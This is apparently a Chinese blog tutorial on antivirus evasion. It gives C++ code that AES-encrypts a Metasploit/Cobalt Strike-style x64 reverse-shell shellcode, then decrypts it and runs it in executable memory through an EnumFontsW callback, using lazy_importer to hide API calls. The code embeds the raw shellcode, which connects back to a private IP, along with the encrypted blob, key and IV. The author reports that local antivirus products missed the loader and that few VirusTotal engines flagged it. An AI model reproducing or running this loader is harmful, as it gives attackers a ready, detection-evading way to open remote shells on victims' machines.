AES加密
什么是aes加密
AES加密,即高级加密标准(Advanced Encryption Standard)加密,是一种对称密钥加密算法,广泛应用于现代密码学中
AES加密的特点如下:
对称密钥:加密和解密过程使用相同的密钥。因此,密钥的安全性至关重要。
密钥长度:AES支持128位、192位和256位三种密钥长度,安全性随密钥长度的增加而增加。
分组长度:AES加密算法对数据进行分组,每个分组固定为128位(16字节)。
加密过程:包括多轮(轮数与密钥长度有关,如AES-128需要10轮,AES-192需要12轮,AES-256需要14轮)的加密操作。每轮操作包括四个步骤:SubBytes(字节替换)、ShiftRows(行移位)、MixColumns(列混淆,最后一轮除外)和AddRoundKey(轮密钥加)
代码实现
这里直接使用乌鸦师傅的aes加密代码:https://cloud.tencent.com/developer/article/1939317,我将aes加密的函数封装在一个静态链接库项目里,再添加了密钥生成函数和shellcode数组转字符串函数,一共有四个函数
//AES加密
string EncryptionAES(const string& strSrc, const char* g_key, const char* g_iv);
//AES解密
string DecryptionAES(const string& strSrc, const char* g_key, const char* g_iv);
//生成随机密钥
string random_string(size_t length);
//将char类型的shellcode转换成string类型的
string toHexString(unsigned char* data, size_t len);
Shellcode_AesEncrypt.cpp
对shellcode进行Aes加密
#include <iostream>
#include "Shellcode加密库.h"
using namespace std;
int main() {
//填写msf或cs生成的shellcode
unsigned char buf[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x51"
"\x48\x8b\x52\x20\x56\x4d\x31\xc9\x48\x8b\x72\x50\x48\x0f"
"\xb7\x4a\x4a\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f"
"\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0"
"\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6"
"\x4d\x31\xc9\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1"
"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8"
"\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41"
"\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83"
"\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9"
"\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00"
"\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49"
"\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x2f\x9b\x41\x54"
"\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5"
"\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b"
"\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31"
"\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41"
"\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58"
"\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5"
"\x85\xc0\x74\x0a\x49\xff\xce\x75\xe5\xe8\x93\x00\x00\x00"
"\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04\x41\x58"
"\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00"
"\x7e\x55\x48\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68"
"\x00\x10\x00\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba"
"\x58\xa4\x53\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31"
"\xc9\x49\x89\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9"
"\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x41\x57\x59\x68"
"\x00\x40\x00\x00\x41\x58\x6a\x00\x5a\x41\xba\x0b\x2f\x0f"
"\x30\xff\xd5\x57\x59\x41\xba\x75\x6e\x4d\x61\xff\xd5\x49"
"\xff\xce\xe9\x3c\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48"
"\x85\xf6\x75\xb4\x41\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2"
"\xf0\xb5\xa2\x56\xff\xd5";
//生成随机16位的key值和iv值
srand(time(0)); // initialize random seed
string g_key = random_string(16);
string g_iv = random_string(16);
cout << "key值: " << g_key << endl;
cout << "iv值: " << g_iv <<endl;
//将shellcode字节数组转换成十六进制字符串
size_t bufLen = sizeof(buf) / sizeof(unsigned char) - 1;
string OriginalShellcode = toHexString(buf, bufLen);
cout << "未加密的shellcode: " << OriginalShellcode << endl;
//对shellcode字符串进行加密
string EncryptShellcode = EncryptionAES(OriginalShellcode,g_key.c_str(),g_iv.c_str());
cout << "加密后的shellcode: " << EncryptShellcode << endl;
//对加密后的shellcode字符串进行解密
string DecryptShellcode = DecryptionAES(EncryptShellcode, g_key.c_str(), g_iv.c_str());
cout << "解密后的shellcode: " << DecryptShellcode << endl;
return 0;
}
Shellcode_AesDecrypt.cpp
用来解密shellcode并加载,此处还调用了lazy_importer库的函数:https://github.com/JustasMasiulis/lazy_importer,此库实现动态调用系统api函数, 只需在函数前面添加(LI_FN
), 若此函数的某个参数需填NULL
, 那么需要改成nullptr
#define _CRT_SECURE_NO_DEPRECATE
#include <iostream>
#include "lazy_importer.hpp"
#define BUF_SIZE 4096
#include <windows.h>
#include "Shellcode加密库.h"
using namespace std;
char g_key[17] = "M7N@ExCVB@dFd]3W"; //填写key密钥
char g_iv[17] = "}%?#U)6;9#uOg6gL"; //定义iv向量
void main(int argc, char* argv[])
{
// 加密后的shellcode
string buf = "Zq3ejgFVl/qtP/dqcQidBN6BKWTiL/KZZpfW+Iy8ZMnaA4Au2oEHMltr8TihG9yvvQ1MDt0PFqboWsF5ka9y72L9xJ5a4HRBFspK3vMwvtKMH8Xtko6ErmfUUB8pv4n4DybjQseeuYtPqEDGvX8zlwONk9nyu5r8aozfNCxLvnbFyzX5OLInbra87Az3FGhilZnCwMufIPZLgolhRkgyhnS96CsMst/pNz4AqcCNmfe7Gw1rcuVgHqETNxwIsNzWDmUguUJ173NHAZJpKmF1k39IYnF4JMvVk3QH81jzX68ClhGvADXnPlmz20PHzzjKOzkovpW4cPT3Q/1B2HOwWwhKPZdLKakJeuSa1YLwv6Nu3UdP8II6dGDVsgb4y/U7O1aiHbJFXSM5XXx7eKqTe8MV8gLfwNNR6M4qaWEm7XmdsE0WryhL5F1SFe/6uxPrcIFnGE3I0jVntLjYfVWotkkrEgL7M6rXlOgKHF3Pd6AIIPm23zULA9NyJsHuKmqOUgyzf7LiPxPcIqhNo5DA1opqCqBS3XTeusUjr6x3AyBT9MquUeJKuB7BBtWJWyuQzTzzSXaDRmErc6lSTM+DKTo101TZYKz4Jl2I8xDMey7IJT+Z1iYt/thgi1FeRLnrGAFKhNn3xAqjYORcKXLPGkSWq1MoZZxOJi6QF1uqMlB3tDBD6w/pAhuqHR+ZxnaHjfbqybG8rNLXc6hshmazoiFakC9QwHM9RgyVde9GGpkNr+wzjp1Tc1SbXSHtFHXumU1IP6NvLqU0/tWrTui9t8nrsqNFgGlQUXyAzmnk04vXJeD7kxGbSFSXwffPGUlOtDS1q/+P+fwj+ZvjpmiPLzoo+hgZ0UOtyO1ThltWr4rWitqMPneleC11qlVcyOp0odOTxuZiUeJyTOY9wHWwXg3snVWat23VSE7eQ4QWcF/GtfRVBsiGGENo1hH1nuxNTlEx/2os30f3IOj/yUfIXpuwHaWsNwlyw6119Z3PgCOdR+1qDCvJenZEsCkyjUJ830xC1V5VxCw1m0btTP+LaefsNEocc5V7fyNyaw0o72yl/g+bacycAbG/hIJlWbaXneDFysBLPtLFJjXm0gAsE3iyffdB9l6c8ffohInaNlWC8x7IDb4X6vrFC8cncDFb3NKIInVFR6bmqXfxXAamxzKXdpVjngPZg6YCWpTUtobZhThnhpO1KZxvHoFCcidxLq+mifWHpcldcS/ez2vWGdriSbd6i9FGGaxQQvHze1HmaLP/sj34JDMfIVfOI2/4sejnjluKfhcu5I0P76idHJKMDHr+rJBtpSxX3jc+UNlfeFmhjuN2Yy/TO1kLRfUdfAeZP2Vz4WhITdRf8bvqJA==";
// 解密shellcode
string strbuf = DecryptionAES(buf, g_key, (char*)g_iv);
//将解密的shellcode放到shellcode数组中
char* p = (char*)strbuf.c_str();
unsigned char* shellcode = (unsigned char*)calloc(strbuf.length() / 2, sizeof(unsigned char));
for (size_t i = 0; i < strbuf.length() / 2; i++) {
sscanf(p, "%02x", &shellcode[i]);
p += 2;
}
//输出shellcode数组里的内容
int ShellcodeSize = strbuf.length() / 2;
printf("Decrypted buffer:\n");
for (int i = 0; i < ShellcodeSize; i++) {
printf("\\x%02x", shellcode[i]);
}
//加载shellcode
char* orig_buffer;
orig_buffer = (char*)LI_FN(VirtualAlloc)(nullptr, ShellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(orig_buffer, shellcode, ShellcodeSize);
//使用EnumUILanguages函数执行解密后的shellcode
//EnumUILanguages((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
//LI_FN(EnumUILanguages)((UILANGUAGE_ENUMPROC)orig_buffer, 0, 0);
//使用EnumFontsW回调函数加载shellcode
EnumFontsW(GetDC(NULL), NULL, (FONTENUMPROCW)orig_buffer, NULL);
}
运行测试
给aes加密项目添加引用,选择Shellcode加密库
修改项目属性,在附加包含目录处添加上Shellcode加密库项目的路径
使用Shellcode_AesEncryption.cpp
进行加密, 随后控制台输出key值、iv值、以及加密后的shellcode
打开Shellcode_AesDecrypt.cpp
,填写上述生成的值, 随后生成可执行文件
将生成的可执行文件放到火绒和360里测试,没有发现报毒
上传至VirusTotal检查,只有四个报毒,免杀效果还是可以的
最后更新于